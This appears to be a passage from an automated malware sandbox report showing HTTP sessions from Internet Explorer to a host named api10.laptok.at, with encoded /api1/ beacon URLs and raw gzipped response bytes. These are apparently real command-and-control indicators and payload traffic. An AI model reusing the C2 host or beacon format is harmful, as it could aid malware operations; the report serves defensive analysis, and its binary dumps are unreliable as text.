1c 3a 5c 51 31 50 ec e3 8c b7 47 4c 6b f2 c2 87 f0 c9 c3 01 fa 9b 6d da 4c 9e ea b2 07 c0 6a 26 83 59 47 a3 0a d9 ca 22 db c6 91 8d ca 17 e3 e3 ac 41 a0 a7 0d 53 13 f7 8c 41 8d 55 89 b6 d9 ee 04 e8 55 9f c8 81 69 5c 1a 08 55 6b 04 f0 53 dc f5 f8 f1 29 73 b9 46 e0 fd 25 c5 77 3e e7 10 06 b1 f4 15 10 e2 27 83 3b 43 6b fd 4c ea b9 7b fa 97 50 9e ae 51 ef 97 15 36 5f 4a ea 06 f2 b2 3a b0 e8 f3 8b 53 b9 fc 95 30 70 7a 94 f5 cb 72 e4 c8 fd 74 2e a1 c0 ca 19 06 a0 d5 2b ab 5b cc 46 71 db 0b b7 ae ed 4b 76 21 92 44 c0 ad b9 bd c7 01 ba f1 c5 50 80 a2 48 31 55 bc af 15 20 e1 e4 34 64 86 9a 55 69 89 33 5c 15 8c 2e 34 b8 91 17 5b 19 e2 d2 d5 e2 e0 49 fd 9b 80 18 94 8c e4 a8 85 82 16 70 88 ac 74 37 f2 05 6b 81 00 71 0f 7e ac 8a
                                                                                                                                      Data Ascii: 2000E@ED&NV9{M2hQoj$B`$6fh2K73_%G(`7u2Aaw;vmdwpv2C NT@51@m!|yM`O6-&;13P'Po4%x\oIgUwHF:#i~;+,</J{1~3t"b{u/s$d7BJ;z"[yedGNI7 c$l95$@X'hO]3AZ8<r#=|?]sb$lwt_'dpgdt{4-:KbQlbx#3`JB@s_Gj3)w71'>iKfmQ9<iKMs090B,1C;'K:-dtr#2X)C>x[d[$?GhV f,Ef=cjq.[9:>"*sB:L@yjxag07nVz1F}8!7[%d:\Q1PGLkmLj&YG"ASAUUi\UkS)sF%w>';CkL{PQ6_J:S0pzrt.+[FqKv!DPH1U 4dUi3\.4[Ipt7kq~
                                                                                                                                      Nov 24, 2020 21:20:02.933444023 CET4057INData Raw: 1a 7f 77 03 d0 a3 78 5c 64 bb f9 d9 d4 3b b6 c6 ee b1 5c 81 d5 c0 eb 80 92 7b e5 d5 94 a7 5c 4a 02 c5 00 2f 7a f0 53 96 d1 86 62 29 a5 50 f2 75 68 09 8f 74 f6 24 12 86 9c 3d 10 1f a8 b8 68 03 0b 7f be c8 b5 81 cf 38 ab 2e 60 31 9e 6a 67 df c2 79
                                                                                                                                      Data Ascii: wx\d;\{\J/zSb)Puht$=h8.`1jgy&f-fsD;2^Wj15N4oa4YTd{p2MV.W\y9k3#0e8D/PVQ0iG{Y}r7NV]yGE7_
                                                                                                                                      Nov 24, 2020 21:20:02.933485985 CET4058INData Raw: 15 2d bd 92 3a a6 44 67 09 40 6d ad 5b 8a 82 b9 d1 b2 af 34 1f fb c7 84 3f c5 80 fa 3c a4 f7 53 50 20 9f 08 dd b6 c3 ac 04 13 64 0e ca 80 89 dd 3f c1 1e 8b 00 62 0e 12 68 ef e1 bd 9b e7 97 aa cd e9 d3 2f bc ca ef 32 ab f1 74 f4 ab 3d f0 68 1b ce
                                                                                                                                      Data Ascii: -:Dg@m[4?<SP d?bh/2t=hYOk+AD~IOCKD~=IxECW`|iAa7E5q_C\p03_=i@N%;/0~j-r*#Nn%l-d7
                                                                                                                                      Nov 24, 2020 21:20:02.933535099 CET4060INData Raw: d1 c7 02 d7 94 02 e9 47 1d 59 16 04 52 0f a7 a2 e9 cd e8 a5 b9 5c 51 ac b3 aa 02 ef d7 6f 57 01 03 ec 61 ed 0d 22 80 7f c1 65 91 cf 25 2d 72 ef 7b 39 3e 62 77 01 13 43 44 5b 31 95 40 69 9e 3f 79 76 6e 7f 04 13 56 30 c8 bf a9 f4 3f 3e 9d ba 69 cc
                                                                                                                                      Data Ascii: GYR\QoWa"e%-r{9>bwCD[1@i?yvnV0?>i_w#aU9Vym>;p2Lq:[gz{?x}v`^OjiJx8C|6Z)wAA8E'x]41?m!hQK4-~Z
                                                                                                                                      Nov 24, 2020 21:20:02.933577061 CET4061INData Raw: 1a a0 bf 81 4e f3 43 2c 90 f6 0f 0b 61 3a f3 67 17 51 d4 13 4d 63 b6 ee ef fd 26 af 07 02 11 3c 47 77 a1 e6 f1 9a d3 50 f2 ab 6a 03 95 72 26 9d ab 49 54 67 16 9f 78 c1 29 9d ec 2c fe 30 bf ed d4 30 af f6 1e 06 50 09 78 83 b8 ea b3 2f c6 76 72 cb
                                                                                                                                      Data Ascii: NC,a:gQMc&<GwPjr&ITgx),00Px/vrAH9EJ>D2zjybUrX.7Zp?'/>2r6}/wdN:pHwReTo2-7Ly"cfU3eJO6!y.oFlnMwbI]
                                                                                                                                      Nov 24, 2020 21:20:02.933614016 CET4062INData Raw: 16 bd 82 bd 31 fb 4c 05 9b ab b4 0d fe d3 91 6c 21 d9 52 44 60 08 66 69 3d 6a 98 71 f8 f0 cd 7b ea 23 a6 46 d5 61 0a d2 81 9e 88 7f d8 4f ff 63 10 1e ac 46 c0 6d a9 0f 3b 96 b7 ac c7 1c 88 39 6e 72 7a 1d 77 76 8a 0a 57 00 7c 7e 0c 35 72 80 85 f1
                                                                                                                                      Data Ascii: 1Ll!RD`fi=jq{#FaOcFm;9nrzwvW|~5r:C1s*K/d3>ix!fIQ%xj6Ug_8|S&X.W&9M5I)ld$eZMCtNF35Nm "dNi*jBy\{8EznbMx-z'
                                                                                                                                      Nov 24, 2020 21:20:02.972738981 CET4064INData Raw: 15 68 2f b1 d0 cb 7b 53 76 80 fa 4f 85 b8 e3 77 3f c1 0d b1 37 bb b1 40 70 01 a5 7a 56 9f 4d 53 36 b4 d9 11 8d 70 1e 29 eb 02 82 29 bb 3a 7c 05 fe 96 bc b3 1d 05 67 37 9d df 18 b1 9d 00 f2 91 76 8f 93 07 47 b8 74 24 4b 67 4d 41 37 80 fb 83 db c3
                                                                                                                                      Data Ascii: h/{SvOw?7@pzVMS6p)):|g7vGt$KgMA7z0Byb\?bujZ~s<tZc[VL2#Ov?0/,#!'P]:qnJ(0{vi^8M<W$>i\{uJwcW2d;Y@}~dp
                                                                                                                                      Nov 24, 2020 21:20:02.972799063 CET4065INData Raw: 64 77 94 50 f8 ff f8 f5 0d 73 28 8c c9 b7 15 0d 5c 96 f8 a1 c6 8a 40 6e 91 15 b7 2b a7 53 65 00 a9 62 36 45 06 75 92 44 90 0f e8 4f 8e e7 4b 87 7c 3b 9b 67 4b 73 66 3f f6 83 8a 02 77 f3 47 7b 0f df b2 83 c5 76 2f f0 8b 36 e3 21 ab b7 9e 57 44 d4
                                                                                                                                      Data Ascii: dwPs(\@n+Seb6EuDOK|;gKsf?wG{v/6!WDlb{8,yRu]Ig:uN}4fS9KP^?_7fa}Cz8X\N69}ey30VBH~<Mm&Ir.z"6aY^g6|F3N5+I}l3
                                                                                                                                      Nov 24, 2020 21:20:02.972841024 CET4067INData Raw: 35 da ae fe cb 63 3e 80 6c 10 3a 97 04 41 4c f9 17 7b 8c c8 c2 d7 10 fe e1 2b 73 1d 76 e2 2e ad 28 56 a5 57 2a 8f 61 92 41 b2 de 7e a0 6a f5 e5 5f 66 11 89 45 38 44 e8 a4 24 60 84 e8 36 09 2d 75 f5 35 bf 95 39 a5 33 a3 0d f2 be ca c2 50 97 d1 0f
                                                                                                                                      Data Ascii: 5c>l:AL{+sv.(VW*aA~j_fE8D$`6-u593PbpA(GwW<ZTD%bk-V?+D,xg{>]!o]5<fjvET%Q"|aF]ff2#Ixi[ifuiLt&f_
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET4068INData Raw: f1 af 49 4b f6 f5 40 74 2d 77 84 fc e3 a4 24 ae ca bf 3b eb 18 d9 71 fa 7f 52 41 f4 65 34 95 bb 9b df 10 a0 5b 4d 36 2f 7f 45 07 df bf bf 39 80 7b fd 13 dd ec 51 83 33 ac b4 3f 01 9f a2 7d 09 1b 24 44 9e 60 57 58 6c 0c 8d fa 54 7d 84 b2 57 a8 49
                                                                                                                                      Data Ascii: IK@t-w$;qRAe4[M6/E9{Q3?}$D`WXlT}WI?~#T_=i4LI/kBsn J;y74/}O(Y)I0djQ"8]jhvhgb7[Szi7c#TFHZd{9+,dG5(SS
                                                                                                                                      Nov 24, 2020 21:20:03.189378977 CET4070INData Raw: 04 7d 25 d5 e0 00 73 df 1b b4 62 fb cb 25 62 e1 c7 fe b2 76 9d e0 d3 03 44 0a fc b2 2c a4 ca ac 57 46 d7 70 35 e1 27 82 4e 54 49 fd 4a 25 77 f1 ee 41 6a b5 f5 da 09 8e a5 dd 27 90 41 3e 8e 27 44 40 a6 99 d6 d2 a3 76 eb 52 31 3f ee da 4f 7d e8 d7
                                                                                                                                      Data Ascii: }%sb%bvD,WFp5'NTIJ%wAj'A>'D@vR1?O}[)j\'WwHCA$L2/b?VO7T_YiY8F=Wf^'YAy$<T'$s-:qE -Bx


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.2.34975047.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:04.595921040 CET4267OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:05.392426014 CET4268INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:05 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      3192.168.2.34975347.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:06.486884117 CET4269OUTGET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:07.513534069 CET4271INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:07 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 96 a4 50 14 45 3f 88 00 b7 10 77 77 32 a4 70 a7 d1 af 1f 26 ac a4 16 bc 77 ef 39 7b 57 af 6e aa e0 5e 15 05 0f 8a 75 43 3a 4a 82 16 6f f7 83 c3 1d ef 42 1c e7 b8 d0 c7 ce 65 a5 8e cd 1c a7 6b f9 86 21 c7 63 3c f9 fa c7 83 d0 df 5c 75 2f 10 51 22 f7 f3 8b ba 9e 56 64 91 10 10 29 cd ba 55 93 41 8d 20 97 3b 68 ea bc 28 be db eb 73 1c e8 36 a9 a9 35 63 4e d9 53 b9 d4 f2 7c ab 0a 22 21 bf 67 c0 5c 2c 37 b8 14 e5 9d 1e fe ef ad d3 e2 9a fb 24 7d f5 16 c6 65 c7 aa 3a 00 e6 53 15 75 e1 54 1c 6d e7 f4 1c 2c 07 80 4a a0 d8 d3 6e 5a 1f f8 83 99 4b 92 3a 3c 8b 7f 69 67 73 7f ef fc 07 a2 a8 0d 94 03 5d 1e e7 46 af 3d 4c 9c 71 19 2d be 45 8b ac aa 45 8d 26 4e 23 4d 37 ce df df 0f 07 19 20 8a 1f 59 a9 89 5e 46 2a d7 8e fa 85 61 7e 4c 77 13 92 5f 6f e5 fa a8 f8 5f 46 29 90 ff fb 6d 54 62 2f 88 aa bf cc 0b 73 ac df bb 1c d9 21 b9 2b 60 0b 6f 2c e6 32 91 aa c5 30 5c 20 81 44 99 b6 78 b2 ff c1 46 44 f1 15 eb 89 44 b8 05 fe cc 53 a9 3b 23 b8 ac cf 9b 37 4e c9 b4 8a c2 9f e5 be ce 86 60 47 e9 76 1b 71 9a 9b 20 f0 77 73 c2 99 16 f2 15 f5 54 83 97 92 10 35 c9 c9 fa f4 85 fc 5b 49 82 0d a9 c7 e6 c5 c5 88 4b de db a9 b2 e8 b1 ac 6a 31 0a bc 05 d4 76 83 54 cf 37 23 e0 b0 2b 9b 71 f8 02 5a 76 43 b6 7d fe a5 54 0f d5 80 bd f4 6a 87 3d 17 55 40 5e 05 4d a8 8f b0 a8 7c 7a a7 28 68 9a 22 31 72 0e 2d 02 b6 59 2a 43 94 96 0b 15 07 6f 5d aa d8 2b 7b 61 ea 24 c3 6b 80 d5 95 b5 b8 dc cc 04 e3 64 40 02 0a c3 d2 fa f4 ac bb 4d 80 a3 c9 0b 71 eb fd 26 d4 14 ad 4b 9c c4 80 68 aa 1f 07 48 18 c5 56 da b4 82 eb 79 9c 8e 92 02 90 0d d8 37 80 38 55 c2 64 26 16 1b a5 24 61 92 97 87 70 53 d4 c5 96 0c a3 da 4e 17 77 5c db 43 4e eb 65 a9 aa 6f 58 44 26 21 59 af c9 f7 68 ad 81 ce d3 35 d4 79 c5 8d 46 ad 85 f8 a0 72 a0 86 fa 5a b6 9b f4 86 fb d3 1c df f1 f0 17 47 e6 2e 0e 73 ea 14 9a dd 89 b6 d5 86 20 26 09 de 97 b2 9a 11 45 1b 05 15 8f 1d e0 44 aa cf eb 45 f7 42 4c 93 f5 d1 dc 2e e9 36 52 c9 f0 c9 9c 58 a8 67 4c 22 96 4a e9 79 aa 3c 54 6d 82 6b d2 7a d7 cc f0 23 63 8b e5 07 2e bf 01 8f 4d 1c 2f 29 dc a8 27 e7 06 15 35 e6 fe 3a 1c ac f3 98 d0 bb f2 11 b2 94 97 e2 3a 83 95 81 64 56 90 44 2d 88 e1 ef 76 43 cb 30 3e ca e1 d9 8a 81 0a f9 88 95 f6 66 ec 8c 5b af e8 9a 64 97 46 62 69 f5 24 36 f2 6c 01 56 e7 7f 4a a6 62 68 cb 19 c7 2e e2 51 25 fc 6a 6e fc 5b e2 8c 7a 08 25 0c 0e c7 c7 cb 40 1b a2 09 83 ea ab ca 7e 9d f0 64 99 4d 66 09 51 b6 22 04 42 04 c2 e7 bd a5 9f c8 7d ce 65 24 2a bd e7 8a d8 7a 3c c3 b9 9d b7 3b 45 98 7b 33 6f c8 82 d2 70 ef c0 f9 17 96 df 46 9a 2c d4 8e cb 0b 4c 30 7c 2e 33 9e 1e 40 16 e9 2b 32 d3 06 84 e9 7b 12 56 3c 87 fe 15 6f e8 08 3b db 35 bd af 4a 48 8d e8 5a 62 c0 a6 6c 94 ed e0 7c fb 81 51 92 74 ff ae 66 07 6a 01 d4 19 43 19 c1 60 5f 19 95 39 8c 03 2d 35 9f e6 7e 6e 9f be 16 4a 4f 78 54 66 2b 31 e0 44 a3 cb 82 49 46 a4 22 11 ae 0c a2 88 8f 4d 67 f0 d7 4f 9c 90 3b bb 6a d4 e7 39 54 2d 39 e4 34 38 b6 c4 7d ad cc c2 bd 3d 4f e9 fb 37 38 de 54 b4 06 dd 93 b8 84 1e a5 7e d5 e4 82 80 69 48 37 f5 f8 78 3f 52 2c 8c b6 a5 4e 10 38 14 c2 8a 97 59 c7 0d 50 2a 11 92 ef f1 a6 e6 b5 b4 bb 56 9e 94 81 40 6b 90 56 48 ec f3 98 1b 6c a5 cc
                                                                                                                                      Data Ascii: 2000PE?ww2p&w9{Wn^uC:JoBek!c<\u/Q"Vd)UA ;h(s65cNS|"!g\,7$}e:SuTm,JnZK:<igs]F=Lq-EE&N#M7 Y^F*a~Lw_o_F)mTb/s!+`o,20\ DxFDDS;#7N`Gvq wsT5[IKj1vT7#+qZvC}Tj=U@^M|z(h"1r-Y*Co]+{a$kd@Mq&KhHVy78Ud&$apSNw\CNeoXD&!Yh5yFrZG.s &EDEBL.6RXgL"Jy<Tmkz#c.M/)'5::dVD-vC0>f[dFbi$6lVJbh.Q%jn[z%@~dMfQ"B}e$*z<;E{3opF,L0|.3@+2{V<o;5JHZbl|QtfjC`_9-5~nJOxTf+1DIF"MgO;j9T-948}=O78T~iH7x?R,N8YP*V@kVHl
                                                                                                                                      Nov 24, 2020 21:20:07.513590097 CET4272INData Raw: 7c 7d c5 13 74 39 95 bc 95 24 84 f3 fb d2 46 be d8 81 4a 39 f1 6d e2 89 2b 49 db 40 da 67 4a be 91 fb 0d a8 80 76 fb e5 e7 64 7f 8f 08 33 ba 58 94 8b d2 92 00 a1 bc 8d 5c 29 6c cd a0 a7 8e 7b 54 bc fd bd 83 cf 26 93 1e c6 c6 6e e3 0b 11 11 f8 33
                                                                                                                                      Data Ascii: |}t9$FJ9m+I@gJvd3X\)l{T&n3+[c|P=^D0tBWN!BOz1:[: T&H_6h A;X^#_^<("#%Ed42LpVw'\6_0
                                                                                                                                      Nov 24, 2020 21:20:07.513618946 CET4273INData Raw: a4 65 62 12 fa c1 cc 94 b0 8f 1d ef 75 64 2c e7 16 e4 b0 21 0a eb 96 4f 36 29 bf a3 fa e5 7a fb ec 1c ab 24 74 f9 39 bb 23 15 79 c0 8a a5 b4 19 2c 4b e2 06 a8 59 fc fc 52 26 1c 19 4d 34 a6 ef f7 b6 71 61 e0 cb 66 52 12 f9 b6 c1 4d e0 35 67 be 4e
                                                                                                                                      Data Ascii: ebud,!O6)z$t9#y,KYR&M4qafRM5gN>!ik{8Q,Z4~S2uk0~d1@*:T&gjO;9h-}%5=3/3^!I{H}m1t:;5L=RV)Pf;
                                                                                                                                      Nov 24, 2020 21:20:07.513648987 CET4275INData Raw: 41 6a b2 ed 1c 81 01 70 ef 09 60 b6 26 a5 81 95 8f 38 f9 30 0a e5 b4 7d 6b 31 25 2a fe 20 b0 e8 e8 5b 2e d2 c2 27 92 d9 a9 54 28 07 14 36 0f 82 a6 5c 6b 91 ee d9 ed 32 dd 35 e6 60 2a 81 88 9b de 0d 2d bb 1e 0e 7a fc 7d 2f cd 02 11 b4 df f9 9f 0d
                                                                                                                                      Data Ascii: Ajp`&80}k1%* [.'T(6\k25`*-z}/|mzwof~>MD"ZB}/Y=q5zkA'5b4VB+=oj,!.}7}t(XJbM!Cdg+*%_Y2UqWJt%XgxU
                                                                                                                                      Nov 24, 2020 21:20:07.513689041 CET4276INData Raw: ea 6c 7a 46 4b 82 43 81 b4 b6 da 0b 10 21 6b fe f4 98 11 3b 20 37 a8 49 18 f9 e6 18 7e a6 75 72 c8 b6 89 33 7f 40 74 18 62 71 05 ef 17 5a 19 82 e1 b3 e3 a2 67 46 54 41 7d 6a 16 62 2d 89 56 a2 3b 2c 5e 62 f1 c3 b6 d0 cc c1 b4 80 ab 02 91 d9 1e 9f
                                                                                                                                      Data Ascii: lzFKC!k; 7I~ur3@tbqZgFTA}jb-V;,^bw!/%:{}%G^2ipUH>/!^"SD)IZu4rm~sS[8|zgSf;xctF-os`Vag3+e
                                                                                                                                      Nov 24, 2020 21:20:07.513729095 CET4277INData Raw: 30 57 d1 d8 71 fa d6 d9 23 b7 a6 d5 6b 01 8b 3f 13 31 fd 16 73 9c c5 1f d2 c8 4e db 5b 20 6a c5 52 71 64 35 7a ba cd fb e8 dc 07 6c 17 d9 13 0f aa 0b ed 4d 9e 24 5d 9d 9c f9 db aa c5 32 ff 82 95 5c 2b cc 45 12 df 4c 3b 73 fb 93 d7 f8 cc 62 20 cf
                                                                                                                                      Data Ascii: 0Wq#k?1sN[ jRqd5zlM$]2\+EL;sb L<'6G.|'@scu;A;uXBbU%AN.y,Y+OHLkET uJ&:9|#e+M;7gypaD[
                                                                                                                                      Nov 24, 2020 21:20:07.552978039 CET4279INData Raw: 27 44 78 2a 25 4a 3e 96 02 22 2b 82 1e ba 99 72 0a 5d 13 90 09 a0 30 fc d6 d7 48 22 a9 80 c0 3f c8 b3 2f a6 44 18 06 9d bf 05 17 53 ee 95 85 9c 2e 19 63 15 77 4b ed f5 32 76 0d 2c 26 43 d8 1a b1 1f a3 7e 57 1c ce f2 cf 20 9a 86 94 83 c5 88 97 ee
                                                                                                                                      Data Ascii: 'Dx*%J>"+r]0H"?/DS.cwK2v,&C~W 7^x[CW|z%DYvM=B]NyxM&@jD']2%8i|]a_{5^~sry6#YB0 t!SGt`H>-m#8b]d4
                                                                                                                                      Nov 24, 2020 21:20:07.553035021 CET4280INData Raw: f1 44 9c e3 4b 94 7a 59 dc a9 85 66 5b 28 00 c3 8c a9 38 85 7a d7 d7 17 59 c3 97 bd bf ed 7c af e1 a2 e1 f4 ca 49 f5 2e d5 a9 93 84 a7 d0 23 f2 59 58 21 f5 78 f8 cf 66 e9 55 b4 ea 6e 6a ee ee 70 66 16 60 35 1e c1 51 69 80 06 41 86 58 d5 f4 43 7b
                                                                                                                                      Data Ascii: DKzYf[(8zY|I.#YX!xfUnjpf`5QiAXC{h"Lz1I"*(/WoOGcSXF/Ue?@<~m.J+6\+AgX#mAd&R?i'6^-zn9!]\#NEx;b`V|se{
                                                                                                                                      Nov 24, 2020 21:20:07.553064108 CET4282INData Raw: 4c 78 2d cd fd 7d 94 f5 e8 e9 37 d8 a7 08 32 60 82 b3 a0 9a 86 e9 c3 ca 5a 1c 2c 34 8e 74 48 c8 10 2e 44 8b 02 1f fb 0e 24 56 c1 04 fb f6 2d e4 60 1d 83 de 88 7e 45 3a 9a 7a be b1 74 cc d1 c1 cf 68 ea 31 b6 13 34 4e 2e e0 96 d8 83 fa 98 cb d9 9f
                                                                                                                                      Data Ascii: Lx-}72`Z,4tH.D$V-`~E:zth14N.dz$x!bnl#`Z?N:~@XX\fCi:nj|E:5cI01Dp;I1E WUU<pW:VOQa<CJb=nXC^
                                                                                                                                      Nov 24, 2020 21:20:07.553095102 CET4283INData Raw: 23 c1 7e 83 08 93 91 1b fd cd 81 3f f4 25 55 7b d7 3b 5f 0b db f5 6d 18 f8 02 d4 0e c7 7e ed f8 35 ea 30 bc 80 02 b4 f4 0c 4b a5 ad b1 e9 15 7e be 9a 23 83 7f ca 9f d4 c5 66 ab 8a 83 59 2f 43 e2 19 60 03 35 6f 51 72 01 81 7b 19 af 81 23 80 ba b2
                                                                                                                                      Data Ascii: #~?%U{;_m~50K~#fY/C`5oQr{#Zc{$r;v$Vt%B+6js u fV4VUzQ<h[lK}{xr-]P0K8 >[gA4H|,7/_!
                                                                                                                                      Nov 24, 2020 21:20:07.774704933 CET4284INData Raw: 60 cf fa 54 07 92 bb 73 56 1e f0 b1 18 6d 26 f1 44 99 e5 50 3d 43 a7 ba db 84 35 43 f5 84 46 85 e3 b6 fe bb a0 2a 69 e4 48 fd 7c 1c 2d 41 11 2c 4e 08 7f fe 21 b9 e2 97 f8 f9 89 f7 85 b3 8c 86 0f 82 fc be b1 97 8c d9 9a ce a1 ca 6c d6 05 46 d7 d3
                                                                                                                                      Data Ascii: `TsVm&DP=C5CF*iH|-A,N!lF(!&ZD%nCI+TU|Zk&q}n+-;P"CIc]}w="4'^G7[wdlCHVkQBUwokc4XQ~(Gm


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      4192.168.2.34975247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:09.379180908 CET4539OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:10.187980890 CET4539INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:09 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      5192.168.2.34975447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:10.932638884 CET4541OUTGET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:11.915036917 CET4542INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
